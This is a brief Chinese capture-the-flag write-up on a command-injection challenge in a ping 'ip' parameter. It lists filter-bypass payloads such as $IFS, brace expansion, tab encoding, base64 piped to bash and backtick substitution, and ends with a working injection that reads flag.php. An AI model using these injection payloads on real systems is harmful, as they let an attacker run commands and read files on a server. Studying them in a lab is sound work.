ip传参ping下试试
;ls查看目录
有flag和index。
尝试查看flag.php,发现有空格过滤和flag过滤
过滤空格的解决办法如下
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
<
<>
{cat,flag.php} //用逗号实现了空格功能
%20
%09
?ip=127.0.0.1;cat$IFS$1index.php
尝试查看源码
发现过滤很多,
1.cat fl* 利用*匹配任意 不行
2.echo “Y2F0IGZsYWcucGhw”| base64 -d | bash 也不行
3.ca\t fl\ag.php 不行
4.cat fl’'ag.php 不行
解决办法
1.$a变量覆盖
2.将ls执行的结果直接当成查询的参数,就不需要flag字符串了。
?ip=127.0.0.1;cat$IFS$9`ls`
阴阳有序,命运无常,以此蝶火,为汝指路